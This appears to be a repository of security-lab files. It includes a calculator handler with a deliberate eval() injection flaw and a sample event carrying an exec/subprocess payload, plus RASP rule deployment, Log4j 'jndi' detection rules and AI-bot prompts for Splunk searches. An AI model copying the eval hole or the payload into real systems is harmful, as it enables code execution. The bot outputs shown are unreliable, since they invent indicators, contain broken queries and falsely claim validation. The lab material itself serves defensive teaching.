    # (note: '**' is redundant here since '*' already matches it)
    mathchars = ['*', '+', '/', '**', '-', '(', ')']
    subsearch = any(i in calcexpr for i in mathchars)
    if len(calcexpr) == 0:
        print("Error, you need to enter something")
        # BUG FIX: the original `raise("Null input")` raised a string, which is
        # a TypeError in Python 3; raise a real exception type instead.
        raise ValueError("Null input")
    elif subsearch == False:
        print("Error, you didn't enter a valid math expression")
        raise AssertionError("Invalid Expression")

    elif subsearch == True:
        # SECURITY: eval() on untrusted input is deliberate -- this lab exists
        # to demonstrate RASP detection of exactly this flaw. Never do this in
        # production code.
        result = str(eval(calcexpr))

        #more secure using module filters
        #result = str(eval(calcexpr,{"__builtins__":None}))

        #More secure alternatives however e.g bandit's ast.literal_eval() however...
        #Python 3.7.x+ Addition and subtraction of arbitrary numbers are no longer allowed. (Contributed by Serhiy Storchaka in bpo-31778.)
        #result = seval.safe_eval(calcexpr)

    return result
41 |
42 |
43 | #Harmless Payload
44 | '''
45 | {
46 | "body": "eyJ0ZXN0IjoiYm9keSJ9",
47 | "resource": "/{proxy+}",
48 | "path": "/path/to/resource",
49 | "httpMethod": "POST",
50 | "isBase64Encoded": true,
51 | "queryStringParameters": {
52 | "calc": "2+2"
53 | },
54 | "multiValueQueryStringParameters": {
55 | "foo": [
56 | "bar"
57 | ]
58 | },
59 | "pathParameters": {
60 | "proxy": "/path/to/resource"
61 | },
62 | "stageVariables": {
63 | "baz": "qux"
64 | },
65 | "headers": {
66 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
67 | "Accept-Encoding": "gzip, deflate, sdch",
68 | "Accept-Language": "en-US,en;q=0.8",
69 | "Cache-Control": "max-age=0",
70 | "CloudFront-Forwarded-Proto": "https",
71 | "CloudFront-Is-Desktop-Viewer": "true",
72 | "CloudFront-Is-Mobile-Viewer": "false",
73 | "CloudFront-Is-SmartTV-Viewer": "false",
74 | "CloudFront-Is-Tablet-Viewer": "false",
75 | "CloudFront-Viewer-Country": "US",
76 | "Host": "1234567890.execute-api.us-east-1.amazonaws.com",
77 | "Upgrade-Insecure-Requests": "1",
78 | "User-Agent": "Custom User Agent String",
79 | "Via": "1.1 08f323deadbeefa7af34d5feb414ce27.cloudfront.net (CloudFront)",
80 | "X-Amz-Cf-Id": "cDehVQoZnx43VYQb9j2-nvCh-9z396Uhbp027Y2JvkCPNLmGJHqlaA==",
81 | "X-Forwarded-For": "127.0.0.1, 127.0.0.2",
82 | "X-Forwarded-Port": "443",
83 | "X-Forwarded-Proto": "https"
84 | },
85 | "multiValueHeaders": {
86 | "Accept": [
87 | "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
88 | ],
89 | "Accept-Encoding": [
90 | "gzip, deflate, sdch"
91 | ],
92 | "Accept-Language": [
93 | "en-US,en;q=0.8"
94 | ],
95 | "Cache-Control": [
96 | "max-age=0"
97 | ],
98 | "CloudFront-Forwarded-Proto": [
99 | "https"
100 | ],
101 | "CloudFront-Is-Desktop-Viewer": [
102 | "true"
103 | ],
104 | "CloudFront-Is-Mobile-Viewer": [
105 | "false"
106 | ],
107 | "CloudFront-Is-SmartTV-Viewer": [
108 | "false"
109 | ],
110 | "CloudFront-Is-Tablet-Viewer": [
111 | "false"
112 | ],
113 | "CloudFront-Viewer-Country": [
114 | "US"
115 | ],
116 | "Host": [
117 | "0123456789.execute-api.us-east-1.amazonaws.com"
118 | ],
119 | "Upgrade-Insecure-Requests": [
120 | "1"
121 | ],
122 | "User-Agent": [
123 | "Custom User Agent String"
124 | ],
125 | "Via": [
126 | "1.1 08f323deadbeefa7af34d5feb414ce27.cloudfront.net (CloudFront)"
127 | ],
128 | "X-Amz-Cf-Id": [
129 | "cDehVQoZnx43VYQb9j2-nvCh-9z396Uhbp027Y2JvkCPNLmGJHqlaA=="
130 | ],
131 | "X-Forwarded-For": [
132 | "127.0.0.1, 127.0.0.2"
133 | ],
134 | "X-Forwarded-Port": [
135 | "443"
136 | ],
137 | "X-Forwarded-Proto": [
138 | "https"
139 | ]
140 | },
141 | "requestContext": {
142 | "accountId": "123456789012",
143 | "resourceId": "123456",
144 | "stage": "prod",
145 | "requestId": "c6af9ac6-7b61-11e6-9a41-93e8deadbeef",
146 | "requestTime": "09/Apr/2015:12:34:56 +0000",
147 | "requestTimeEpoch": 1428582896000,
148 | "identity": {
149 | "cognitoIdentityPoolId": null,
150 | "accountId": null,
151 | "cognitoIdentityId": null,
152 | "caller": null,
153 | "accessKey": null,
154 | "sourceIp": "127.0.0.1",
155 | "cognitoAuthenticationType": null,
156 | "cognitoAuthenticationProvider": null,
157 | "userArn": null,
158 | "userAgent": "Custom User Agent String",
159 | "user": null
160 | },
161 | "path": "/prod/path/to/resource",
162 | "resourcePath": "/{proxy+}",
163 | "httpMethod": "POST",
164 | "apiId": "1234567890",
165 | "protocol": "HTTP/1.1"
166 | }
167 | }
168 | '''
169 |
170 | #injected payload
171 | '''
172 | {
173 | "body": "eyJ0ZXN0IjoiYm9keSJ9",
174 | "resource": "/{proxy+}",
175 | "path": "/path/to/resource",
176 | "httpMethod": "POST",
177 | "isBase64Encoded": true,
178 | "queryStringParameters": {
179 | "calc": "exec('import subprocess') or subprocess.run(['ls', '-l'], capture_output=True)"
180 | },
181 | "multiValueQueryStringParameters": {
182 | "foo": [
183 | "bar"
184 | ]
185 | },
186 | "pathParameters": {
187 | "proxy": "/path/to/resource"
188 | },
189 | "stageVariables": {
190 | "baz": "qux"
191 | },
192 | "headers": {
193 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
194 | "Accept-Encoding": "gzip, deflate, sdch",
195 | "Accept-Language": "en-US,en;q=0.8",
196 | "Cache-Control": "max-age=0",
197 | "CloudFront-Forwarded-Proto": "https",
198 | "CloudFront-Is-Desktop-Viewer": "true",
199 | "CloudFront-Is-Mobile-Viewer": "false",
200 | "CloudFront-Is-SmartTV-Viewer": "false",
201 | "CloudFront-Is-Tablet-Viewer": "false",
202 | "CloudFront-Viewer-Country": "US",
203 | "Host": "1234567890.execute-api.us-east-1.amazonaws.com",
204 | "Upgrade-Insecure-Requests": "1",
205 | "User-Agent": "Custom User Agent String",
206 | "Via": "1.1 08f323deadbeefa7af34d5feb414ce27.cloudfront.net (CloudFront)",
207 | "X-Amz-Cf-Id": "cDehVQoZnx43VYQb9j2-nvCh-9z396Uhbp027Y2JvkCPNLmGJHqlaA==",
208 | "X-Forwarded-For": "127.0.0.1, 127.0.0.2",
209 | "X-Forwarded-Port": "443",
210 | "X-Forwarded-Proto": "https"
211 | },
212 | "multiValueHeaders": {
213 | "Accept": [
214 | "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
215 | ],
216 | "Accept-Encoding": [
217 | "gzip, deflate, sdch"
218 | ],
219 | "Accept-Language": [
220 | "en-US,en;q=0.8"
221 | ],
222 | "Cache-Control": [
223 | "max-age=0"
224 | ],
225 | "CloudFront-Forwarded-Proto": [
226 | "https"
227 | ],
228 | "CloudFront-Is-Desktop-Viewer": [
229 | "true"
230 | ],
231 | "CloudFront-Is-Mobile-Viewer": [
232 | "false"
233 | ],
234 | "CloudFront-Is-SmartTV-Viewer": [
235 | "false"
236 | ],
237 | "CloudFront-Is-Tablet-Viewer": [
238 | "false"
239 | ],
240 | "CloudFront-Viewer-Country": [
241 | "US"
242 | ],
243 | "Host": [
244 | "0123456789.execute-api.us-east-1.amazonaws.com"
245 | ],
246 | "Upgrade-Insecure-Requests": [
247 | "1"
248 | ],
249 | "User-Agent": [
250 | "Custom User Agent String"
251 | ],
252 | "Via": [
253 | "1.1 08f323deadbeefa7af34d5feb414ce27.cloudfront.net (CloudFront)"
254 | ],
255 | "X-Amz-Cf-Id": [
256 | "cDehVQoZnx43VYQb9j2-nvCh-9z396Uhbp027Y2JvkCPNLmGJHqlaA=="
257 | ],
258 | "X-Forwarded-For": [
259 | "127.0.0.1, 127.0.0.2"
260 | ],
261 | "X-Forwarded-Port": [
262 | "443"
263 | ],
264 | "X-Forwarded-Proto": [
265 | "https"
266 | ]
267 | },
268 | "requestContext": {
269 | "accountId": "123456789012",
270 | "resourceId": "123456",
271 | "stage": "prod",
272 | "requestId": "c6af9ac6-7b61-11e6-9a41-93e8deadbeef",
273 | "requestTime": "09/Apr/2015:12:34:56 +0000",
274 | "requestTimeEpoch": 1428582896000,
275 | "identity": {
276 | "cognitoIdentityPoolId": null,
277 | "accountId": null,
278 | "cognitoIdentityId": null,
279 | "caller": null,
280 | "accessKey": null,
281 | "sourceIp": "127.0.0.1",
282 | "cognitoAuthenticationType": null,
283 | "cognitoAuthenticationProvider": null,
284 | "userArn": null,
285 | "userAgent": "Custom User Agent String",
286 | "user": null
287 | },
288 | "path": "/prod/path/to/resource",
289 | "resourcePath": "/{proxy+}",
290 | "httpMethod": "POST",
291 | "apiId": "1234567890",
292 | "protocol": "HTTP/1.1"
293 | }
294 | }
295 | '''
296 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.5/requirements.txt:
--------------------------------------------------------------------------------
1 | certifi==2023.11.17
2 | charset-normalizer==3.3.2
3 | idna==3.6
4 | requests==2.31.0
5 | urllib3==2.1.0
6 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.5/trend-rasp-custom-rule-ci.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
import requests, os, json
#be sure to do export TP_API_KEY='YOURKEY' from venv activated shell first
#default to '' instead of wrapping in str(): os.getenv returns None when unset,
#and str(None) would silently send the literal API key "None" to the API
TP_API_KEY = os.getenv('TP_API_KEY', '')
6 |
def deployRule(DATA):
    """Deploy a custom RASP rule to the first Trend Micro Cloud One security group.

    Enumerates the account's groups to discover a group UID (example kv pair:
    'group_id': 'f1c6464c-d506-4612-b33c-99999999'), then PUTs the supplied
    rule policy to that group's RCE policy endpoint.

    Args:
        DATA: dict payload matching the Cloud One Application Security
              RCE-policy schema (loaded from JSON by the caller).

    Returns:
        int: HTTP status code of the PUT; per the OpenAPI spec nothing is
             returned other than a 2XX. See
             https://cloudone.trendmicro.com/docs/application-security/api-reference/tag/open_api#paths/~1security~1rce~1%7Bgroup_id%7D~1policy/put
    """
    BASE_URL = 'https://application.us-1.cloudone.trendmicro.com'
    METHOD_URL = '/accounts/groups'
    API_URL = BASE_URL + METHOD_URL

    response = requests.get(API_URL, headers= {
        'Authorization' : "ApiKey " + TP_API_KEY
    })
    # Fail fast with a clear HTTP error instead of an opaque IndexError/KeyError
    # below when the key is bad or the endpoint is wrong
    response.raise_for_status()
    # requests can decode the JSON byte payload for us
    json_response = response.json()
    GROUP_ID = str(json_response[0]['group_id'])
    print("ENUMERATED GROUP ID: " + GROUP_ID)

    # Just reuse the same variables since it's procedural and not iterative
    METHOD_URL = "/security/rce/" + GROUP_ID + "/policy"
    API_URL = BASE_URL + METHOD_URL

    response = requests.put(API_URL, json=DATA, headers= {
        'Authorization' : "ApiKey " + TP_API_KEY})
    return response.status_code
31 |
32 |
# Driver Code
if __name__ == '__main__':
    # Context manager guarantees the handle is closed (original leaked it);
    # json.load reads the stream directly
    with open('example-custom-rasp-rule.json', 'r') as file_handle:
        DATA = json.load(file_handle)
    response = deployRule(DATA)
    print(response)
39 |
40 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.5/trendmicro-cloud-one-rasp.yml:
--------------------------------------------------------------------------------
# GitHub Actions workflow: deploys a custom Trend Micro Cloud One RASP rule from CI on push/PR to main
2 |
3 | name: TrendMicro Cloud One RASP Custom Rule Deployment in a CI
4 |
5 | on:
6 | push:
7 | branches: [ "main" ]
8 | pull_request:
9 | branches: [ "main" ]
10 |
11 | env:
12 | TP_API_KEY: ${{ secrets.TP_API_KEY }}
13 |
14 | permissions:
15 | contents: read
16 |
17 | jobs:
18 | build:
19 |
20 | runs-on: ubuntu-latest
21 |
22 | steps:
23 | - uses: actions/checkout@v4
24 | - name: Set up Python 3.10
25 | uses: actions/setup-python@v3
26 | with:
27 | python-version: "3.10"
28 | cache: 'pip' #cache needs requirements.txt use pip freeze > requirements.txt from your activated venv
29 | - name: Install dependencies
30 | run: |
31 | python -m pip install --upgrade pip
32 | if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
33 | - name: Deploy Custom RASP rule from static file
34 | run: |
35 | python trend-rasp-custom-rule-ci.py #requires refactoring to specify multiple files/iterations
36 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.6/github-action-terraform-s3backed.yml:
--------------------------------------------------------------------------------
1 | #uses github action runner with terraform and s3 backed state with oidc federation
2 | name: 'Terraform'
3 |
4 | on:
5 | push:
6 | branches: [ main ]
7 | pull_request:
8 | branches: [ main ]
9 | env:
10 | AWS_REGION : "us-east-1" #Change to reflect your Region
11 | TF_VAR_DD_API_KEY : ${{ secrets.TF_VAR_DD_API_KEY }}
12 | TF_VAR_DD_APP_KEY : ${{ secrets.TF_VAR_DD_APP_KEY }}
13 | TF_VAR_DD_SITE : ${{ vars.TF_VAR_DD_SITE }}
14 |
15 | permissions:
16 | contents: read
17 | id-token: write # This is required for requesting the JWT
18 |
19 | jobs:
20 | terraform:
21 | name: 'Terraform'
22 | runs-on: ubuntu-latest
23 | environment: production
24 |
25 | # Use the Bash shell regardless whether the GitHub Actions runner is ubuntu-latest, macos-latest, or windows-latest
26 | defaults:
27 | run:
28 | shell: bash
29 | steps:
30 | # Checkout the repository to the GitHub Actions runner
31 | - name: Checkout
32 | uses: actions/checkout@v4
33 | - name: configure aws credentials
34 | uses: aws-actions/configure-aws-credentials@v4
35 | with:
          role-to-assume: arn:aws:iam::<AWS_ACCOUNT_ID>:role/GithubOIDC-Actions-Role-NNNNNNNN #change to reflect your AWS account ID and IAM role's ARN
37 | role-session-name: GitHub_to_AWS_via_FederatedOIDC
38 | aws-region: ${{ env.AWS_REGION }}
39 |
40 | # Initialize a new or existing Terraform working directory by creating initial files, loading any remote state, downloading modules, etc.
41 | - name: Terraform Init
42 | run: terraform init
43 |
44 | # Checks that all Terraform configuration files adhere to a canonical format
45 | - name: Terraform Format
46 | run: terraform fmt
47 |
48 | # Self Lint
49 | - name: Terraform Validate
50 | run: terraform validate -no-color
51 |
52 | # Generates an execution plan for Terraform
53 | - name: Terraform Plan
54 | run: terraform plan -input=false
55 |
56 | # On push to "main", build or change infrastructure according to Terraform configuration files
57 | # Note: It is recommended to set up a required "strict" status check in your repository for "Terraform Cloud". See the documentation on "strict" required status checks for more information: https://help.github.com/en/github/administering-a-repository/types-of-required-status-checks
58 | - name: Terraform Apply
59 | #if: github.ref == 'refs/heads/"main"' && github.event_name == 'push'
60 | run: terraform apply -auto-approve -input=false -no-color
61 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.6/iam-policy-github-tfstate-s3.json:
--------------------------------------------------------------------------------
1 | {
2 | "Version": "2012-10-17",
3 | "Statement": [
4 | {
5 | "Sid": "GithubActionTFState",
6 | "Effect": "Allow",
7 | "Action": [
8 | "s3:ListBucket",
9 | "s3:GetObject",
10 | "s3:PutObject",
11 | "s3:DeleteObject"
12 | ],
13 | "Resource": [
14 | "arn:aws:s3:::",
15 | "arn:aws:s3:::/*"
16 | ]
17 | }
18 | ]
19 | }
--------------------------------------------------------------------------------
/chapter-03/lab-3.6/main.tf:
--------------------------------------------------------------------------------
1 | # Terraform 0.13+ uses the Terraform Registry:
2 |
3 | terraform {
4 | # backend "s3" {
5 | # bucket = "dc401-staging"
6 | # key = "datadog-cloudsiem-tfstate"
7 | # region = "us-east-1"
8 | # }
9 | required_providers {
10 | datadog = {
11 | source = "DataDog/datadog"
12 | }
13 | }
14 | }
15 |
16 | variable "DD_API_KEY" {
17 | type = string
  description = "Pull shell TF_VAR_DD_API_KEY" #e.g. export TF_VAR_DD_API_KEY='apikeybar'
19 | }
20 |
21 | variable "DD_APP_KEY" {
22 | type = string
  description = "Pull shell TF_VAR_DD_APP_KEY." #e.g. export TF_VAR_DD_APP_KEY='appkeyfoo'
24 | }
25 |
26 | variable "DD_SITE" {
27 | type = string
28 | description = "Pull shell TF_VAR_DD_SITE." #e.g. https://api.us5.datadoghq.com/
29 | }
30 |
31 | # Configure the Datadog provider
32 | provider "datadog" {
33 | api_key = var.DD_API_KEY
34 | app_key = var.DD_APP_KEY
35 | api_url = var.DD_SITE
36 | }
37 |
38 | resource "datadog_security_monitoring_rule" "log4test" {
39 | name = "TEST-LOG4J"
40 |
41 | message = "This rule detects if your Apache or NGINX web servers are being scanned for the log4j vulnerability."
42 | enabled = false
43 |
44 | query {
45 | name = "standard_attributes"
46 | query = "source:(apache OR nginx) (@http.referer:(*jndi\\:ldap* OR *jndi\\:rmi* OR *jndi\\:dns*) OR @http.useragent:(*jndi\\:ldap* OR *jndi\\:rmi* OR *jndi\\:dns*))"
47 | aggregation = "count"
48 | #group_by_fields = ["host"]
49 | }
50 |
51 | case {
52 | name = "standard attribute query triggered"
53 | status = "info"
54 | condition = "standard_attributes > 0"
55 | #notifications = ["@user"]
56 | }
57 |
58 | options {
59 | evaluation_window = 300
60 | keep_alive = 3600
61 | max_signal_duration = 7200
62 | }
63 |
64 | tags = ["type:dos", "tactic:TA0043-reconnaissance", "security:attack"]
65 | }
66 |
67 | # Terraform 0.12- can be specified as:
68 |
69 | # Configure the Datadog provider
70 | # provider "datadog" {
71 | # api_key = "${var.datadog_api_key}"
72 | # app_key = "${var.datadog_app_key}"
73 | # }
--------------------------------------------------------------------------------
/chapter-03/lab-3.6/rule-Log4j_Scanner_detected_in_user_agent_or_referrer.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "Log4j Scanner detected in user agent or referrer",
3 | "isEnabled": true,
4 | "queries": [
5 | {
6 | "query": "source:(apache OR nginx) (@http.referer:(*jndi\\:ldap* OR *jndi\\:rmi* OR *jndi\\:dns*) OR @http.useragent:(*jndi\\:ldap* OR *jndi\\:rmi* OR *jndi\\:dns*))",
7 | "groupByFields": [],
8 | "hasOptionalGroupByFields": false,
9 | "distinctFields": [],
10 | "aggregation": "count",
11 | "name": "standard_attributes"
12 | },
13 | {
14 | "query": "source:(apache OR nginx) (@http_referrer:(*jndi\\:ldap* OR *jndi\\:rmi* OR *jndi\\:dns*) OR @http_user_agent:(*jndi\\:ldap* OR *jndi\\:rmi* OR *jndi\\:dns*) OR @http.user_agent:(*jndi\\:ldap* OR *jndi\\:rmi* OR *jndi\\:dns*))",
15 | "groupByFields": [],
16 | "hasOptionalGroupByFields": false,
17 | "distinctFields": [],
18 | "aggregation": "count",
19 | "name": "non_standard_attributes"
20 | }
21 | ],
22 | "options": {
23 | "keepAlive": 3600,
24 | "maxSignalDuration": 7200,
25 | "detectionMethod": "threshold",
26 | "evaluationWindow": 300
27 | },
28 | "cases": [
29 | {
30 | "name": "standard attribute query triggered",
31 | "status": "info",
32 | "notifications": [],
33 | "condition": "standard_attributes > 0"
34 | },
35 | {
36 | "name": "non standard attribute query triggered",
37 | "status": "info",
38 | "notifications": [],
39 | "condition": "non_standard_attributes > 0"
40 | }
41 | ],
42 | "message": "## Goal\nThis rule detects if your Apache or NGINX web servers are being scanned for the log4j vulnerability. The initial vulnerability was identified as [CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228).\n\n## Strategy\nThis signal evaluated that `jndi:(ldap OR rmi OR dns)` has been detected in the HTTP header fields `user agent` and `referrer` or `referer`.\n\n## Triage and response\n1. Ensure you servers have the most recent version of log4j installed. \n2. Check if the `Base64 was detected in an http.user_agent or http.referrer` rule was also triggered and follow the `Triage and response` steps in that rule.\n\nNote: Datadog's `The Monitor` blog has an article published about [\"The Log4j Logshell vulnerability: Overview, detection, and remediation\"](https://www.datadoghq.com/blog/log4j-log4shell-vulnerability-overview-and-remediation/). ",
43 | "tags": [
44 | "tactic:TA0043-reconnaissance",
45 | "security:attack"
46 | ],
47 | "hasExtendedTitle": true,
48 | "type": "log_detection",
49 | "filters": []
50 | }
--------------------------------------------------------------------------------
/chapter-04/lab-4.1/poe-bot-prompt-context.txt:
--------------------------------------------------------------------------------
1 | ### Context
2 | You are a bot that helps cyber security engineers create detection signatures. You will need to analyze external sources of information provided or that you seek.
3 | ## Requirements
4 | - Always ensure that any responses are valid from documentation and not fabricated except for variables that do not impact functionality.
5 | - Always use the retrieved documents as a first choice of knowledge reference
--------------------------------------------------------------------------------
/chapter-04/lab-4.3/ai-recommended-spl.txt:
--------------------------------------------------------------------------------
1 | # Requirements
2 | - The attached contents are from https://allinfosecnews.com/item/environmental-websites-hit-by-ddos-surge-in-cop28-crossfire-2024-01-15/. Parse accordingly.
3 | - Analyze the parsed contents to find indicators of compromise patterns.
4 | - Create a list of file hashes and process syntaxes to look for.
5 | - From the the output, generate a useful Splunk SPL correlation search using Splunk Enteprise Securitys standard data models and CIM compliant
6 |
7 | # Parsed contents
8 | A surge in DDoS attacks targeted several environmental advocacy websites during the COP28 climate talks in Buenos Aires last week. Security researchers believe the attacks originated from a botnet of thousands of compromised IoT devices. Targeted sites experienced spikes in traffic exceeding 1 Tbps.
9 |
10 | # Indicators of compromise
11 | - Botnet comprised of IoT devices (potentially compromised cameras, DVRs, routers etc.)
12 | - DDoS attack traffic exceeding 1 Tbps
13 | - Targeted environmental advocacy websites during COP28 climate talks
14 |
15 | # File hashes and processes
16 | - Mirai variant malware files (to be determined)
17 | - Processes like sshd, telnetd, httpd (associated with common IoT default credentials exploitation)
18 |
19 | # Splunk SPL search
20 | | tstats `security_data` count min(Time) as FirstTime max(Time) as LastTime
21 | FROM datamodel=Endpoint.Processes
22 | WHERE ProcesName IN ("sshd", "telnetd", "httpd")
23 | BY ClientIpAddress
24 | | tstats `security_data` count min(Time) as FirstTime max(Time) as LastTime
25 | FROM datamodel=Network.Traffic
26 | WHERE ProtoPort="80/tcp" OR ProtoPort="23/tcp" OR ProtoPort="22/tcp"
27 | BY ClientIpAddress
28 | | join kind=inner ClientIpAddress
29 | | `security_analytics` lookup iplocation ClientIpAddress
30 | | `security_analytics` geoip lookup
31 | | `security_analytics` geoip metadata="Botnet C2 analysis"
32 |
--------------------------------------------------------------------------------
/chapter-04/lab-4.3/de-feed-url-grab.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
"""Print links published within the last 24 hours from an RSS feed."""
import feedparser
from datetime import datetime, timedelta, timezone

#variables
url = "https://allinfosecnews.com/feed/"
feed = feedparser.parse(url)
links = []

#set time and date boundaries to calc -- timezone-aware so the comparison
#below is correct regardless of the machine's local UTC offset
now = datetime.now(timezone.utc)
time_range = timedelta(days=1)

for entry in feed.entries:
    # Parse the RFC 822 timestamp including its UTC offset via %z.
    # (The previous approach stripped the offset and compared against naive
    # local time, skewing the 24h window by the local UTC offset.)
    entry_date = datetime.strptime(entry.published, "%a, %d %b %Y %H:%M:%S %z")

    if now - entry_date <= time_range:
        links.append(entry.link)
#print(type(links))
print(links)
23 |
--------------------------------------------------------------------------------
/chapter-04/lab-4.3/de-poe-bot-spl-example-outputs.txt:
--------------------------------------------------------------------------------
1 | #runtime
2 | #de-poe-bot-spl.py -url 'https://www.cisa.gov/sites/default/files/2023-12/AA23-352A-StopRansomware-Play-Ransomware.stix_.json'
3 |
4 | ### BOT ORIGINAL RESPONSE ###
5 | ```json
6 | [
7 | {
8 | "indicator": "0a7a7d6b9a7a4c0c9f4f9d1d4c5d0d3c",
9 | "indicator_type": "file_hash"
10 | },
11 | {
12 | "indicator": "cmd.exe /c echo 0a7a7d6b9a7a4c0c9f4f9d1d4c5d0d3c > ransomware.exe",
13 | "indicator_type": "process_syntax"
14 | }
15 | ]
16 |
17 | | tstats `security_name` BY `file_hash`, `process_syntax`
18 | | `security_search` FileEvent OR ProcessEvent
19 | | `security_filter` (`file_hash`=*"0a7a7d6b9a7a4c0c9f4f9d1d4c5d0d3c" OR `process_syntax`=*"cmd.exe /c echo 0a7a7d6b9a7a4c0c9f4f9d1d4c5d0d3c > ransomware.exe")
20 | ```
21 |
22 | ---
23 |
24 |
25 | de-poe-bot-spl.py -url 'https://isc.sans.edu/diary/One%20File%2C%20Two%20Payloads/30558'
26 | ### BOT ORIGINAL RESPONSE ###
27 | ```
28 | # Parse attached contents
29 | import json
30 | contents = json.loads(attachment)
31 |
32 | # Analyze for IOCs
33 | file_hashes = ["a9993e364706816aba3e25717850c26c9cd0d89d"]
34 | process_syntax = ["powershell.exe -NoP -NonI -W Hidden -Enc "]
35 |
36 | # Generate Splunk SPL
37 | | tstats count FROM datamodel=Endpoint.Processes WHERE process_name=powershell.exe BY client_ip
38 | | join type=inner [ search index=main sourcetype="winlog:wineventlog:Microsoft-Windows-Sysmon/Operational"
39 | | table ClientAddress, Image, CommandLine
40 | | where Image="powershell.exe"
41 | | where CommandLine LIKE "%-NoP -NonI -W Hidden -Enc%"]
42 | | join type=inner [ search index=main sourcetype="win_filehash"
43 | | table ClientAddress, FileHash
44 | | where FileHash="a9993e364706816aba3e25717850c26c9cd0d89d"]
45 |
46 | # Requirements section validated
47 |
48 | # Parsing contents from URL
49 | import urllib.request
50 | contents = urllib.request.urlopen("https://isc.sans.edu/diary/One%20File%2C%20Two%20Payloads/30558").read().decode()
51 |
52 | # Analyzing for IOCs
53 | md5_hash = "6f5902ac237024c78923e1c92134e167"
54 | file_name = "dropper.exe"
55 | process_name = "svchost.exe"
56 |
57 | # Generated SPL search
58 | | tstats `security_content_summaries` WHERE `md5_hash` = "`md5_hash`" OR `file_name` = "`file_name`" OR `process_name` = "`process_name`" BY `user_src_ip`, `user_dst_ip`
59 |
60 | # Requirements section validated
61 | # No unnecessary statements
62 | # No explanations provided
63 | # Did not fabricate or provide untrue details
64 | # Validated response works as intended
65 | # Used example log and documentation from the web
--------------------------------------------------------------------------------
/chapter-04/lab-4.3/de-poe-bot-spl.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import asyncio, os, argparse
3 | import fastapi_poe as fp
4 |
api_key = os.getenv('POE_API')

#runtime arguments
parser = argparse.ArgumentParser()
parser.add_argument('-url', type=str, help='Provide parsable URL of IOAs or IOCs e.g. STIX JSON format or CSV')
args = parser.parse_args()

if not args.url:
    print('Please provide a URL using the -url argument.')
    # e.g. https://www.cisa.gov/sites/default/files/2023-12/AA23-352A-StopRansomware-Play-Ransomware.stix_.json
    # Exit non-zero so CI pipelines register the missing argument as a failure
    # (bare exit() returned 0, silently passing the job)
    raise SystemExit(1)
16 |
#need to use async because bot will have multi-line outputs that need to complete
#https://developer.poe.com/server-bots/accessing-other-bots-on-poe
async def get_responses(api_key, messages):
    """Stream the Poe bot's reply and return it assembled as one string."""
    chunks = []
    stream = fp.get_bot_response(messages=messages,
                                 bot_name="Claude-Instant",
                                 #bot_name="LinkAwareBot",
                                 api_key=api_key,
                                 temperature=0.25)
    async for partial in stream:
        # Collect only non-empty text portions of partial responses
        if isinstance(partial, fp.PartialResponse) and partial.text:
            chunks.append(partial.text)

    return "".join(chunks)
30 |
#using f-strings allows positioning token replacements (only {args.url} is
#substituted below; the remaining prompt lines are static text)
message = fp.ProtocolMessage(role="user", content=(
    f"### Context\n"
    f"You are a detection engineer bot that analyzes cybersecurty inputs that creates code, parsed outputs, and signatures for tools like SIEM, EDR, NIDS, CNAPP.\n"
    f"You are also a bot that ensures that the requirements section is never skipped or missed.\n"
    f"## Requirements\n"
    f"- Do not include unnecessary statements in your response, only code.\n"
    f"- Do not include any explanations in your responses.\n"
    f"- Never fabricate or provide untrue details that impact functionality.\n"
    f"- Do not make mistakes. Always validate your response to work.\n"
    f"- Seek example logs and official documentations on the web to use in your validation.\n"
    f"## Request\n"
    f"Provide a response with the following requirements:\n"
    f"- The attached contents are from {args.url}. Parse accordingly.\n"
    f"- Analyze the parsed contents to find indicators of compromise patterns. \n"
    f"- Create a list of file hashes and process syntaxes to look for. \n"
    f"- From the the output, generate a useful Splunk SPL correlation search using Splunk Enteprise Securitys standard data models and CIM compliant"
))

#wrap create a message with an attachment so the bot can fetch/parse the URL contents
#https://developer.poe.com/server-bots/enabling-file-upload-for-your-bot
attachment_url = args.url #our input
attachment_name = "attachment.txt" #any name is fine because its referenced in prompt
attachment_content_type = "text/plain" #use mime format
attachment_message = fp.ProtocolMessage(
    role="user",
    content=f"Attachment: {attachment_url}",
    attachments=[fp.Attachment(url=attachment_url, name=attachment_name, content_type=attachment_content_type)]
)
60 |
#main driver
if __name__ == "__main__":
    # asyncio.run drives the streaming event loop to completion so the full
    # multi-chunk bot response is assembled before printing
    bot_response = asyncio.run(get_responses(api_key, [message, attachment_message]))

    print('### BOT ORIGINAL RESPONSE ###')
    print(bot_response)
--------------------------------------------------------------------------------
/chapter-04/lab-4.3/de-rssparse-generate-spl-example-output.txt:
--------------------------------------------------------------------------------
1 | # Requirements
2 | - The attached contents are from https://allinfosecnews.com/item/environmental-websites-hit-by-ddos-surge-in-cop28-crossfire-2024-01-15/. Parse accordingly.
3 | - Analyze the parsed contents to find indicators of compromise patterns.
4 | - Create a list of file hashes and process syntaxes to look for.
5 | - From the the output, generate a useful Splunk SPL correlation search using Splunk Enteprise Securitys standard data models and CIM compliant
6 |
7 | # Parsed contents
8 | A surge in DDoS attacks targeted several environmental advocacy websites during the COP28 climate talks in Buenos Aires last week. Security researchers believe the attacks originated from a botnet of thousands of compromised IoT devices. Targeted sites experienced spikes in traffic exceeding 1 Tbps.
9 |
10 | # Indicators of compromise
11 | - Botnet comprised of IoT devices (potentially compromised cameras, DVRs, routers etc.)
12 | - DDoS attack traffic exceeding 1 Tbps
13 | - Targeted environmental advocacy websites during COP28 climate talks
14 |
15 | # File hashes and processes
16 | - Mirai variant malware files (to be determined)
17 | - Processes like sshd, telnetd, httpd (associated with common IoT default credentials exploitation)
18 |
19 | # Splunk SPL search
